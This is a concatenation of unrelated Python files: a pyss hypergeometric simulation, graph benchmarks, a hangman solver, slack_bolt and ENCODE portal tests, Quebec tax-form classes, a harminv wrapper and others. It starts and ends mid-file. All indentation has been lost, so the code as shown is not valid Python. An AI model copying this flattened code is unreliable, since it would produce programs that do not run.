- k - количество объектов с заданным свойством в выборке n
См. https://ru.wikipedia.org/wiki/%D0%93%D0%B8%D0%BF%D0%B5%D1%80%D0%B3%D0%B5%D0%BE%D0%BC%D0%B5%D1%82%D1%80%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B5_%D1%80%D0%B0%D1%81%D0%BF%D1%80%D0%B5%D0%B4%D0%B5%D0%BB%D0%B5%D0%BD%D0%B8%D0%B5
ЦИТАТА:
"Классическим применением гипергеометрического распределения является выборка без возвращения.
Рассмотрим урну с двумя типами шаров: черными и белыми.
Определим вытягивание белого шара как успех, а черного как неудачу.
Если N является числом всех шаров в урне и D является числом белых шаров,
то N − D является числом черных шаров.
Теперь предположим, что в урне находятся WHITE = 5 белых и BLACK = 45 черных шаров.
Стоя рядом с урной, вы закрываете глаза и вытаскиваете 10 шаров."
Модель показывает количество вытянутых белых шаров.
Белые шары моделируются числом 1.
Чёрные шары моделируются числом 0.
Формируется 5 одинаковых моделей с 5 таблицами, собирающими факты возникновения событий.
После моделирования выполняется построение графиков возникновения событий.
"""
# pylint: disable=line-too-long,missing-docstring,bad-whitespace
import sys
import os
import random
import math
import os
DIRNAME_MODULE = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(sys.argv[0]))))) + os.sep
sys.path.append(DIRNAME_MODULE)
sys.path.append(DIRNAME_MODULE + "pyss" + os.sep)
from pyss import pyssobject
from pyss.pyss_model import PyssModel
from pyss.segment import Segment
from pyss import generate
from pyss.generate import Generate
from pyss.terminate import Terminate
from pyss import logger
from pyss.table import Table
from pyss.assemble import Assemble
from pyss.qtable import Qtable
from pyss.handle import Handle
from pyss.enter import Enter
from pyss.leave import Leave
from pyss.storage import Storage
from pyss.advance import Advance
from pyss.assign import Assign
from pyss.preempt import Preempt
from pyss.g_return import GReturn
from pyss.facility import Facility
from pyss.seize import Seize
from pyss.release import Release
from pyss.transfer import Transfer
from pyss.tabulate import Tabulate
from pyss.test import Test
from pyss.queue import Queue
from pyss.depart import Depart
from pyss.split import Split
from pyss.test import Test
from pyss.bprint import Bprint
from pyss.gate import Gate
from pyss.pyss_const import *
from pyss.func_discrete import FuncDiscrete
from pyss.func_exponential import Exponential
from pyss.func_normal import Normal
from pyss.plot_func import PlotFunc
from pyss.simpleobject import SimpleObject
def main():
logger.info("--- Гипергеометрические распределение ---")
random.seed()
#
N=10
WHITE = 5
BLACK = 45
# совокупность
T=[0]*BLACK
T.extend([1]*WHITE)
print T
def valFunc_T_1(owner, transact):
l=[random.choice(T) for x in range(N)]
print "Выбрано: %s"%str(l)
return sum(l)
CAPTION="hypergeometricDistribution"
### MODEL ----------------------------------
m = PyssModel()
sgm = Segment(m)
#
m[OPTIONS].setAllFalse()
m[OPTIONS].printResult = True
#
MAX_TIME=24*4
# tables
F_1="F_1"
def argFunc_T_1(owner, transact):
return transact[TIME_CREATED]
tables = Table(m,
tableName="T_1",
argFunc=argFunc_T_1,
limitUpFirst=1,
widthInt=1,
countInt=MAX_TIME).setDisplaying(displaying=False)
#
def mf(owner, currentTime):
#бросок монеты
return 1
#генерится см. mf()
Generate(sgm, med_value=0, modificatorFunc=mf,first_tx=0, max_amount=1000)
Tabulate(sgm, table=m.getTables()[0],valFunc=valFunc_T_1)
Terminate(sgm, deltaTerminate=0)
#
m.initPlotTable(title=CAPTION)
#
m.start(terminationCount=MAX_TIME, maxTime=MAX_TIME)
#
m.plotByModulesAndSave(CAPTION)
m.plotByModulesAndShow()
if __name__ == '__main__':
main()
|
from timeit import timeit
from source import adjacency_graph, edges_graph, records_graph
def timer(repeats=1):
def decorator(f):
def new_function():
full_time = timeit(f, number=repeats)
return round(full_time, 3)
return new_function
return decorator
class EGraph:
@staticmethod
@timer(repeats=10 ** 6)
def vertex_neighbors():
edges_graph.vertex_neighbors('P3')
@staticmethod
@timer(repeats=10 ** 6)
def edges_number():
edges_graph.edges_number()
@staticmethod
@timer(repeats=10 ** 6)
def is_chain():
edges_graph.is_chain(['E2', 'N2', 'P3', 'P1', 'N1', 'A2'])
@staticmethod
@timer(repeats=10 ** 6)
def vertex_by_weights_sum():
edges_graph.vertex_by_weights_sum(weight=36)
class RGraph:
@staticmethod
@timer(repeats=10 ** 6)
def vertex_neighbors():
records_graph.vertex_neighbors('P3')
@staticmethod
@timer(repeats=10 ** 6)
def edges_number():
records_graph.edges_number()
@staticmethod
@timer(repeats=10 ** 6)
def is_chain():
records_graph.is_chain(['E2', 'N2', 'P3', 'P1', 'N1', 'A2'])
@staticmethod
@timer(repeats=10 ** 6)
def vertex_by_weights_sum():
records_graph.vertex_by_weights_sum(weight=36)
class AGraph:
@staticmethod
@timer(repeats=10 ** 6)
def vertex_neighbors():
adjacency_graph.vertex_neighbors('P3')
@staticmethod
@timer(repeats=10 ** 6)
def edges_number():
adjacency_graph.edges_number()
@staticmethod
@timer(repeats=10 ** 6)
def is_chain():
adjacency_graph.is_chain(['E2', 'N2', 'P3', 'P1', 'N1', 'A2'])
@staticmethod
@timer(repeats=10 ** 6)
def vertex_by_weights_sum():
adjacency_graph.vertex_by_weights_sum(weight=36)
|
# Simple hangman solver, guesses letters in order of frequency
import re
print('anttispitkanen')
words = []
temp_words = []
word = input().strip()
while word:
words.append(word)
temp_words.append(word)
word = input().strip()
letters = {letter for word in words for letter in word}
frequencies = [(letter, sum(word.count(letter) for word in words)) for letter in letters]
guess_order = sorted(frequencies, key=lambda a: a[1], reverse=True)
def remove_words_of_wrong_length(corr_length):
remaining_words = []
for word in words:
if len(word) == corr_length:
remaining_words.append(word)
return remaining_words
def recount_guess_order(new_set_of_words):
letters = {letter for word in new_set_of_words for letter in word}
frequencies = [(letter, sum(word.count(letter) for word in new_set_of_words)) for letter in letters]
guess_order = sorted(frequencies, key=lambda a: a[1], reverse=True)
return guess_order
def find_most_common_letter(guess_order, forbidden_letters):
i = 0
while True:
if guess_order[i][0] not in forbidden_letters:
return guess_order[i][0]
break
else:
i+=1
def filter_words_with_wrong_letter(letter, words):
new_words = []
for word in words:
if letter not in word:
new_words.append(word)
return new_words
def match_regex(reg_string, words):
new_words = []
for word in words:
if re.match(reg_string, word):
new_words.append(word)
return new_words
def remove_guessed_words(temp_words, guessed_words):
new_words = []
for word in temp_words:
if word not in guessed_words:
new_words.append(word)
return new_words
# GAMEPLAY #####################################################################
try:
status = input()
word_length = len(status)
while status:
temp_words = remove_words_of_wrong_length(word_length)
guess_order = recount_guess_order(temp_words)
used_letters = []
guessed_words = [] #for full words that are guessed already
while True:
most_common_letter = find_most_common_letter(guess_order, used_letters)
#remove possibly guessed full words
temp_words = remove_guessed_words(temp_words, guessed_words)
#if there's only one possible word, try that
if len(temp_words) < 5:
print(temp_words[0])
guessed_words.append(temp_words[0]) #add to guessed_words
result = input()
status = input()
else:
print(most_common_letter)
used_letters.append(most_common_letter)
result = input()
status = input()
#this shit intended
if result.startswith('HIT'):
#update based on a correct letter
temp_words = match_regex(status, temp_words)
guess_order = recount_guess_order(temp_words)
else:
#update based on a wrong letter
temp_words = filter_words_with_wrong_letter(most_common_letter, temp_words)
guess_order = recount_guess_order(temp_words)
if status.startswith('WIN') or status.startswith('LOSE') or not status:
used_letters = []
status = input()
word_length = len(status)
break
except EOFError:
pass
|
num = float(input('Digite um número real: '))
print(f'O quadrado de {num} é {num ** 2}')
|
class Solution:
def lengthOfLongestSubstring(self, s: str) -> int:
arr = []
res = 0
for i in range(len(s)):
if s[i] in arr:
res = max(res, len(arr))
arr.append(s[i])
ind = arr.index(s[i])
arr = arr[ind+1:]
else:
arr.append(s[i])
res = max(res, len(arr))
return res
s = "abcabcbb"
s = "bbbbb"
s = "pwwkew"
s = ""
s = "aab"
sol = Solution()
print(sol.lengthOfLongestSubstring(s))
|
import math
class Edge:
def __init__(self, lower, upper):
assert upper >= lower
self.lower = lower
self.upper = upper
@property
def width(self):
return (self.upper - self.lower)
@property
def log_ratio(self):
if self.lower <= 0:
return 1
return math.log(self.upper/self.lower)
def get_overlap(edge1, edge2):
IS_LOWER, IS_UPPER = True, False
points = sorted([(edge1.lower, IS_LOWER), (edge1.upper, IS_UPPER),
(edge2.lower, IS_LOWER), (edge2.upper, IS_UPPER)], key=lambda x: x[0])
# the second item must be a lower point and the third item must be an upper point
# for overlap
overlap = points[1][1] == IS_LOWER and points[2][1] == IS_UPPER
overlap_edge = Edge(lower=points[1][0], upper=points[2][0])
return overlap, overlap_edge
def _get_edges_from_bounds(bounds):
return [Edge(bound, bounds[i+1])
for i, bound in enumerate(bounds[:-1])]
def _convert_imp(input_bounds, input_values, output_bounds, cfunc):
"""
Returns the output_values depending on the cfunc.
output_bounds is a list of energies, units are irrelevant,
as long as it matches the units of the input_bounds.
Asserts both input and output bounds are of length greater than 1
Assumes that input and output bounds are in ascending energy. If not
then it will go unchecked and will produce odd results
"""
assert len(output_bounds) > 1
assert len(input_bounds) > 1
input_edges = _get_edges_from_bounds(input_bounds)
output_edges = _get_edges_from_bounds(output_bounds)
def compute_overlap(oedge, last_overlap_index=0):
output_value = 0.0
prev_has_overlap = False
for i, iedge in enumerate(input_edges):
has_overlap, overlap_edge = get_overlap(iedge, oedge)
if has_overlap:
last_overlap_index = i
output_value += cfunc(iedge,
input_values[i],
overlap_edge)
if not has_overlap and prev_has_overlap:
break
prev_has_overlap = has_overlap
return output_value, last_overlap_index
last_index = 0
output_values = []
for edge in output_edges:
output_value, last_index = compute_overlap(
edge, last_overlap_index=last_index)
output_values.append(output_value)
return output_values
def by_energy(input_bounds, input_values, output_bounds):
def cfunc(input_edge, input_value, overlapping_edge):
return overlapping_edge.width*input_value/input_edge.width
return _convert_imp(input_bounds, input_values, output_bounds, cfunc)
def by_lethargy(input_bounds, input_values, output_bounds):
def cfunc(input_edge, input_value, overlapping_edge):
return overlapping_edge.log_ratio*input_value/input_edge.log_ratio
return _convert_imp(input_bounds, input_values, output_bounds, cfunc)
|
import sys
from setuptools import setup, find_packages
install_requires=[
'Pillow>=2.2.2',
'Jinja2>=2.7,<2.8',
]
tests_require=[
'cssutils>=0.9,<1.0',
]
# as of Python >= 2.7 argparse module is maintained within Python.
if sys.version_info < (2, 7):
install_requires.append('argparse>=1.1')
# as of Python >= 3.3 unittest.mock module is maintained within Python.
if sys.version_info < (3, 3):
tests_require.append('mock>=1.0')
setup(
name='glue',
version='0.9.4',
url='http://github.com/jorgebastida/glue',
license='BSD',
author='Jorge Bastida',
author_email='me@jorgebastida.com',
description='Glue is a simple command line tool to generate sprites.',
long_description=('Glue is a simple command line tool to generate '
'sprites using any kind of source images like '
'PNG, JPEG or GIF. Glue will generate a unique PNG '
'file containing every source image and a map file '
'including the necessary information to use it.'),
keywords = "glue sprites css cocos2d",
packages = find_packages(),
platforms='any',
install_requires=install_requires,
tests_require=tests_require,
test_suite='tests',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Utilities'
],
entry_points = {
'console_scripts': [
'glue = glue.bin:main',
]
},
zip_safe = False
)
|
import asyncio
from ssl import SSLContext
import pytest
from slack_sdk import WebClient
from slack_sdk.oauth.installation_store import FileInstallationStore
from slack_sdk.oauth.state_store import FileOAuthStateStore
from slack_sdk.web.async_client import AsyncWebClient
from slack_bolt.async_app import AsyncApp
from slack_bolt.authorization import AuthorizeResult
from slack_bolt.context.async_context import AsyncBoltContext
from slack_bolt.error import BoltError
from slack_bolt.oauth.async_oauth_flow import AsyncOAuthFlow
from slack_bolt.oauth.async_oauth_settings import AsyncOAuthSettings
from slack_bolt.request.async_request import AsyncBoltRequest
from tests.mock_web_api_server import (
setup_mock_web_api_server,
cleanup_mock_web_api_server,
)
from tests.utils import remove_os_env_temporarily, restore_os_env
class TestAsyncApp:
signing_secret = "secret"
valid_token = "xoxb-valid"
mock_api_server_base_url = "http://localhost:8888"
@pytest.fixture
def event_loop(self):
old_os_env = remove_os_env_temporarily()
try:
setup_mock_web_api_server(self)
loop = asyncio.get_event_loop()
yield loop
loop.close()
cleanup_mock_web_api_server(self)
finally:
restore_os_env(old_os_env)
def setup_method(self):
self.old_os_env = remove_os_env_temporarily()
def teardown_method(self):
restore_os_env(self.old_os_env)
def non_coro_func(self, ack):
ack()
def test_non_coroutine_func_listener(self):
app = AsyncApp(signing_secret="valid", token="xoxb-xxx")
with pytest.raises(BoltError):
app.action("a")(self.non_coro_func)
async def simple_listener(self, ack):
await ack()
def test_listener_registration_error(self):
app = AsyncApp(signing_secret="valid", token="xoxb-xxx")
with pytest.raises(BoltError):
app.action({"type": "invalid_type", "action_id": "a"})(self.simple_listener)
# NOTE: We intentionally don't have this test in scenario_tests
# to avoid having async dependencies in the tests.
def test_invalid_client_type(self):
with pytest.raises(BoltError):
AsyncApp(signing_secret="valid", client=WebClient(token="xoxb-xxx"))
# --------------------------
# single team auth
# --------------------------
def test_valid_single_auth(self):
app = AsyncApp(signing_secret="valid", token="xoxb-xxx")
assert app != None
def test_token_absence(self):
with pytest.raises(BoltError):
AsyncApp(signing_secret="valid", token=None)
with pytest.raises(BoltError):
AsyncApp(signing_secret="valid", token="")
# --------------------------
# multi teams auth
# --------------------------
def test_valid_multi_auth(self):
app = AsyncApp(
signing_secret="valid",
oauth_settings=AsyncOAuthSettings(
client_id="111.222", client_secret="valid"
),
)
assert app != None
def test_valid_multi_auth_oauth_flow(self):
oauth_flow = AsyncOAuthFlow(
settings=AsyncOAuthSettings(
client_id="111.222",
client_secret="valid",
installation_store=FileInstallationStore(),
state_store=FileOAuthStateStore(expiration_seconds=120),
)
)
app = AsyncApp(signing_secret="valid", oauth_flow=oauth_flow)
assert app != None
def test_valid_multi_auth_client_id_absence(self):
with pytest.raises(BoltError):
AsyncApp(
signing_secret="valid",
oauth_settings=AsyncOAuthSettings(
client_id=None, client_secret="valid"
),
)
def test_valid_multi_auth_secret_absence(self):
with pytest.raises(BoltError):
AsyncApp(
signing_secret="valid",
oauth_settings=AsyncOAuthSettings(
client_id="111.222", client_secret=None
),
)
def test_authorize_conflicts(self):
oauth_settings = AsyncOAuthSettings(
client_id="111.222",
client_secret="valid",
installation_store=FileInstallationStore(),
state_store=FileOAuthStateStore(expiration_seconds=120),
)
# no error with this
AsyncApp(signing_secret="valid", oauth_settings=oauth_settings)
def authorize() -> AuthorizeResult:
return AuthorizeResult(enterprise_id="E111", team_id="T111")
with pytest.raises(BoltError):
AsyncApp(
signing_secret="valid",
authorize=authorize,
oauth_settings=oauth_settings,
)
oauth_flow = AsyncOAuthFlow(settings=oauth_settings)
# no error with this
AsyncApp(signing_secret="valid", oauth_flow=oauth_flow)
with pytest.raises(BoltError):
AsyncApp(signing_secret="valid", authorize=authorize, oauth_flow=oauth_flow)
def test_installation_store_conflicts(self):
store1 = FileInstallationStore()
store2 = FileInstallationStore()
app = AsyncApp(
signing_secret="valid",
oauth_settings=AsyncOAuthSettings(
client_id="111.222",
client_secret="valid",
installation_store=store1,
),
installation_store=store2,
)
assert app.installation_store is store1
app = AsyncApp(
signing_secret="valid",
oauth_flow=AsyncOAuthFlow(
settings=AsyncOAuthSettings(
client_id="111.222",
client_secret="valid",
installation_store=store1,
)
),
installation_store=store2,
)
assert app.installation_store is store1
app = AsyncApp(
signing_secret="valid",
oauth_flow=AsyncOAuthFlow(
settings=AsyncOAuthSettings(
client_id="111.222",
client_secret="valid",
)
),
installation_store=store1,
)
assert app.installation_store is store1
@pytest.mark.asyncio
async def test_proxy_ssl_for_respond(self):
ssl = SSLContext()
web_client = AsyncWebClient(
token=self.valid_token,
base_url=self.mock_api_server_base_url,
proxy="http://proxy-host:9000/",
ssl=ssl,
)
async def my_authorize():
return AuthorizeResult(
enterprise_id="E111",
team_id="T111",
)
app = AsyncApp(
signing_secret="valid",
client=web_client,
authorize=my_authorize,
)
event_body = {
"token": "verification_token",
"team_id": "T111",
"enterprise_id": "E111",
"api_app_id": "A111",
"event": {
"client_msg_id": "9cbd4c5b-7ddf-4ede-b479-ad21fca66d63",
"type": "app_mention",
"text": "<@W111> Hi there!",
"user": "W222",
"ts": "1595926230.009600",
"team": "T111",
"channel": "C111",
"event_ts": "1595926230.009600",
},
"type": "event_callback",
"event_id": "Ev111",
"event_time": 1595926230,
}
result = {"called": False}
@app.event("app_mention")
async def handle(context: AsyncBoltContext, respond):
assert context.respond.proxy == "http://proxy-host:9000/"
assert context.respond.ssl == ssl
assert respond.proxy == "http://proxy-host:9000/"
assert respond.ssl == ssl
result["called"] = True
req = AsyncBoltRequest(body=event_body, headers={}, mode="socket_mode")
response = await app.async_dispatch(req)
assert response.status == 200
await asyncio.sleep(0.5) # wait a bit after auto ack()
assert result["called"] is True
|
dt.filename = '//femto/C/All Projects/APS/Experiments/2018.06/Archive/PATHOS.dt.txt'
flag.filename = '//mx340hs/data/anfinrud_1805/Archive/PATHOS.flag.txt'
|
import pytest
def test_rnaseq_remote_portal_init():
from genomic_data_service.rnaseq.remote.portal import Portal
portal = Portal()
assert isinstance(portal, Portal)
def test_rnaseq_remote_portal_get_gene_url():
from genomic_data_service.rnaseq.remote.portal import Portal
portal = Portal()
assert portal._get_gene_url() == (
'https://www.encodeproject.org/search/'
'?type=Gene&advancedQuery=dbxrefs:ENSEMBL*'
'&organism.scientific_name=Homo+sapiens'
'&organism.scientific_name=Mus+musculus'
'&field=@id&field=dbxrefs&field=geneid'
'&field=name&field=organism.scientific_name'
'&field=symbol&field=synonyms&field=title'
'&format=json&limit=all'
)
def test_rnaseq_remote_portal_get_dataset_url():
from genomic_data_service.rnaseq.remote.portal import Portal
portal = Portal()
assert portal._get_dataset_url() == (
'https://www.encodeproject.org/search/'
'?type=Experiment&status=released&assay_title=polyA+plus+RNA-seq'
'&assay_title=total+RNA-seq&assay_title=polyA+minus+RNA-seq'
'&replicates.library.biosample.donor.organism.scientific_name=Homo+sapiens'
'&replicates.library.biosample.donor.organism.scientific_name=Mus+musculus'
'&assembly=GRCh38&assembly=mm10&files.file_type=tsv'
'&field=biosample_summary'
'&field=replicates.library.biosample.sex'
'&field=replicates.library.biosample.age'
'&field=replicates.library.biosample.age_units'
'&field=replicates.library.biosample.donor.organism.scientific_name'
'&format=json&limit=all'
)
def test_rnaseq_remote_portal_get_file_url():
from genomic_data_service.rnaseq.remote.portal import Portal
portal = Portal()
assert portal._get_file_url() == (
'https://www.encodeproject.org/search/'
'?type=File&status=released&output_type=gene+quantifications'
'&output_category=quantification&file_format=tsv&assembly=GRCh38&assembly=mm10'
'&assay_title=polyA+plus+RNA-seq&assay_title=total+RNA-seq&assay_title=polyA+minus+RNA-seq'
'&lab.title=ENCODE+Processing+Pipeline'
'&genome_annotation=V29'
'&genome_annotation=M21'
'&preferred_default=true'
'&field=assay_title&field=assembly'
'&field=biosample_ontology.organ_slims&field=biosample_ontology.term_name'
'&field=biosample_ontology.synonyms&field=biosample_ontology.name&field=biosample_ontology.term_id'
'&field=biosample_ontology.classification&field=dataset'
'&field=donors&field=file_type&field=genome_annotation&field=href'
'&field=md5sum&field=output_type&field=s3_uri&field=title'
'&format=json&limit=all'
)
def test_rnaseq_remote_portal_load_genes(mocker, raw_human_genes):
from genomic_data_service.rnaseq.remote.portal import Portal
mocker.patch(
'genomic_data_service.rnaseq.remote.portal.get_json',
return_value={
'@graph': raw_human_genes
}
)
portal = Portal()
portal.load_genes()
assert 'genes' in portal.repositories
assert len(portal.repositories['genes']) == 5
expected_gene_ids = [
'ENSG00000224939',
'ENSG00000283857',
'ENSG00000260442',
'ENSG00000221650',
'ENSG00000034677',
]
for expected_gene_id in expected_gene_ids:
assert expected_gene_id in portal.repositories['genes']
def test_rnaseq_remote_portal_load_datasets(mocker, raw_datasets):
from genomic_data_service.rnaseq.remote.portal import Portal
mocker.patch(
'genomic_data_service.rnaseq.remote.portal.get_json',
return_value={
'@graph': raw_datasets
}
)
portal = Portal()
portal.load_datasets()
assert 'datasets' in portal.repositories
assert len(portal.repositories['datasets']) == 3
expected_dataset_ids = [
'/experiments/ENCSR113HQM/',
'/experiments/ENCSR906HEV/',
'/experiments/ENCSR938LSP/',
]
for expected_dataset_id in expected_dataset_ids:
assert expected_dataset_id in portal.repositories['datasets']
def test_rnaseq_remote_portal_get_rna_seq_files(mock_portal):
files = list(mock_portal.get_rna_seq_files())
assert len(files) == 4
|
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
from __future__ import absolute_import
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.schema import Column, ForeignKey
from sqlalchemy.types import Integer, String, Float
# ============= enthought library imports =======================
# ============= standard library imports ========================
# ============= local library imports ==========================
Base = declarative_base()
def foreignkey(name):
return Column(Integer, ForeignKey('{}.id'.format(name)))
def stringcolumn(size=40, *args, **kw):
return Column(String(size), *args, **kw)
def doublecolumn(**kw):
if 'default' not in kw:
kw['default'] = 0
return Column(Float(32), **kw)
# ============= EOF =============================================
|
# From this directory, execute
# magnetovis --script=Axis.py
import paraview.simple as pvs
import magnetovis as mvs
sourceArguments = {
"time": "2001-01-01",
"extent": [-40., 40.],
"coord_sys": "GSM",
"direction": "X"
}
displayArguments = {
"showSource": True,
"renderView": None,
"displayRepresentation": "Surface",
"opacity": None,
"ambientColor": None,
'diffuseColor': None
}
Axis = mvs.Axis(
registrationName="Z-Axis",
sourceArguments=sourceArguments,
renderSource=True,
displayArguments=displayArguments # Ignored if renderSource=False
)
displayArguments['showSource'] = True
displayArguments['ambientColor'] = [1, 0, 0]
displayArguments['diffuseColor'] = [1, 0, 0]
Axis.SetDisplayOptions(displayArguments)
# reset view to fit data
Axis.renderView.ResetCamera()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from slack_logging.formatters import LevelEmojis, SlackLoggerFormatter
from slack_logging.handlers import SlackLoggerHandler
def configure_slack_logger(logger_name):
"""
build a logger with handlers for the configured channels
:type logger_name: str|unicode
:rtype: logging.Logger
"""
logger = logging.getLogger(logger_name)
handler = SlackLoggerHandler()
handler.setFormatter(SlackLoggerFormatter())
logger.addHandler(handler)
return logger
def set_slack_message_format(fmt):
"""Sets the message format for the formatters"""
SlackLoggerFormatter.BASE_FORMAT = fmt
def set_level_emoji(log_level, emoji):
"""
Set the specifics of a slack message format (colour and emoji) for each log level
:type log_level: str
:param str emoji: a slack emoji string e.g. :joy:
"""
if hasattr(LevelEmojis, log_level):
setattr(LevelEmojis, log_level, emoji)
else:
raise ValueError('Unsupported log level {}'.format(log_level))
|
import os
from srd import add_params_as_attr, add_schedule_as_attr
from srd.quebec import template
module_dir = os.path.dirname(os.path.dirname(__file__))
# wrapper to pick correct year
def form(year):
"""
Fonction qui permet de sélectionner le formulaire d'impôt provincial par année.
Parameters
----------
year: int
année (présentement entre 2016 et 2020)
Returns
-------
class instance
Une instance du formulaire pour l'année sélectionnée.
"""
if year == 2016:
p = form_2016()
if year == 2017:
p = form_2017()
if year == 2018:
p = form_2018()
if year == 2019:
p = form_2019()
if year == 2020:
p = form_2020()
return p
class form_2016(template):
"""
Formulaire d'impôt de 2016.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/quebec/params/measures_2016.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/schedule_2016.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/chcare_2016.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/health_contrib_2016.csv')
class form_2017(form_2016):
"""
Formulaire d'impôt de 2017.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/quebec/params/measures_2017.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/schedule_2017.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/chcare_2017.csv')
def calc_contributions(self, p, hh):
"""
Fonction qui remplace dans le gabarit (classe *srd.quebec.template*) la fonction du même nom, et calcule les contributions.
Cette fonction fait la somme des contributions du contribuable. La contribution santé est abolie en 2017.
Parameters
----------
p: Person
instance de la classe Person
hh: Hhold
instance de la classe Hhold
"""
p.prov_return['contributions'] += self.add_contrib_subsid_chcare(p, hh)
def get_donations_cred(self, p):
"""
Fonction qui remplace dans le gabarit (classe *srd.quebec.template*) la fonction du même nom, et calcule le crédit d'impôt non-remboursable pour dons.
Parameters
----------
p: Person
instance de la classe Person
Returns
-------
float
Montant du crédit
"""
tot_donation = p.donation + p.gift
if tot_donation <= self.nrtc_donation_low_cut:
return tot_donation * self.nrtc_donation_low_rate
else:
extra_donation = tot_donation - self.nrtc_donation_low_cut
high_inc = max(0, p.fed_return['taxable_income']
- self.nrtc_donation_high_cut)
donation_high_inc = min(extra_donation, high_inc)
donation_low_inc = extra_donation - donation_high_inc
return (self.nrtc_donation_low_cut * self.nrtc_donation_low_rate
+ donation_high_inc * self.nrtc_donation_high_rate
+ donation_low_inc * self.nrtc_donation_med_rate)
class form_2018(form_2017):
"""
Formulaire d'impôt de 2018.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/quebec/params/measures_2018.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/schedule_2018.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/chcare_2018.csv')
def senior_assist(self, p, hh):
"""
Fonction qui remplace dans le gabarit (classe *srd.quebec.template*) la fonction du même nom, et calcule le crédit remboursable pour support aux ainés. En vigueur à partir de 2018.
Parameters
----------
p: Person
instance de la classe Person
hh: Hhold
instance de la classe Hhold
Returns
-------
float
Montant du crédit
"""
if max([p.age for p in hh.sp]) < self.senior_assist_min_age:
return 0
n_elderly = len([p.age for p in hh.sp
if p.age >= self.senior_assist_min_age])
amount = self.senior_assist_amount * n_elderly
if hh.couple:
cutoff = self.senior_assist_cutoff_couple
else:
cutoff = self.senior_assist_cutoff_single
clawback = self.senior_assist_claw_rate * max(0, hh.fam_net_inc_prov - cutoff)
return max(0, amount - clawback) / (1 + hh.couple)
class form_2019(form_2018):
"""
Formulaire d'impôt de 2019.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/quebec/params/measures_2019.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/schedule_2019.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/chcare_2019.csv')
def calc_contributions(self, p, hh):
"""
Fonction qui remplace la fonction antérieure du même nom, et calcule les contributions.
Cette fonction fait la somme des contributions du contribuable. La contribution additionnelle pour service de garde éducatifs à l'enfance subventionnés est abolie en 2019.
Parameters
----------
p: Person
instance de la classe Person
hh: Hhold
instance de la classe Hhold
"""
pass
class form_2020(form_2019):
"""
Formulaire d'impôt de 2020.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/quebec/params/measures_2020.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/schedule_2020.csv')
add_schedule_as_attr(self, module_dir + '/quebec/params/chcare_2020.csv')
|
from .resultsmontage import results_montage
from .sortedcolormontage import create_sorted_color_montage
from .colorutils import color_histogram
from .colorutils import get_dominant_color
|
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the stepPerms function below.
def stepPerms(n,m=3):
tot=0
for x in rec(n,m):
n=1
i=0
l=0
while i<m:
if x[1] > 0:
l+=x[1]
n*=math.factorial(l)/(math.factorial(l-x[1])*math.factorial(x[1]))
x=x[3]
i+=1
tot+=n
return int(tot)%10000000007
def rec(n,m):
res=[]
a=int(n/m)
i=0
if m == 1:
res.append([n,n,m,[]])
else:
while i<=a:
r=n- i*m
for x in rec(r,m-1):
res.append([n,i,m,x])
i+=1
return res
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = int(input())
for s_itr in range(s):
n = int(input())
res = stepPerms(n)
fptr.write(str(res) + '\n')
fptr.close()
|
import sys
import os
# import current path
projectFolder = os.path.dirname(__file__)
if projectFolder not in sys.path:
sys.path.append(projectFolder)
# attach debugger
from lib.sdk.debugger import *
pydev_path = "JetBrains/Toolbox/apps/PyCharm-P/ch-0/192.6262.63/helpers/pydev"
debug(pydev_path)
import loader
reload(loader)
import model.configuration
reload(model.configuration)
import controller.configurationItemView
reload(controller.configurationItemView)
loader.run()
|
import numpy as np
from . import charminv
class Harminv(charminv.Harminv):
threshold = {'error': 0.1,
'relative_error': np.inf,
'amplitude': 0.0,
'relative_amplitude': -1.0,
'Q': 10.0
}
def compute_threshold(self, inrange=False):
rel_amp = self.amplitude.max() * self.threshold['relative_amplitude']
rel_err = self.error.min() * self.threshold['relative_error']
ok = (((not inrange) |
((self.fmin < self.freq) & (self.fmax > self.freq)))
& (self.error <= self.threshold['error'])
& (self.error <= rel_err)
& (self.amplitude >= self.threshold['amplitude'])
& (self.amplitude >= rel_amp)
& (np.abs(self.Q) > self.threshold['Q']))
return ok
@property
def modes(self):
t = np.arange(self.signal.size) * self.dt
return self.compute_modes(t)
def compute_modes(self, time):
modes = self.amplitude * np.exp(-1j * (2 * np.pi * self.freq
* time[None].T - self.phase)
- self.decay * time[None].T)
return modes.T
def invert(signal, fmin, fmax, dt=1, nf=100):
"""Compute the *Harmonic Inversion* of the given signal.
Returns a numpy recarray, with the results of the inversion
available as attributes.
Usage:
import harminv
tau = 2 * np.pi
time = np.linspace(0, 1, 1000)
signal = np.cos(12 * tau * time) + np.cos(5 * tau * time)
inversion = harminv.invert(signal, fmin=2, fmax=100, dt=0.001)
# access the frequencies
inversion.frequency
# access the amplitudes
inversion.amplitudes
# reconstruct the signal
components = (inversion.amplitude
* np.exp(-1j * (2 * np.pi
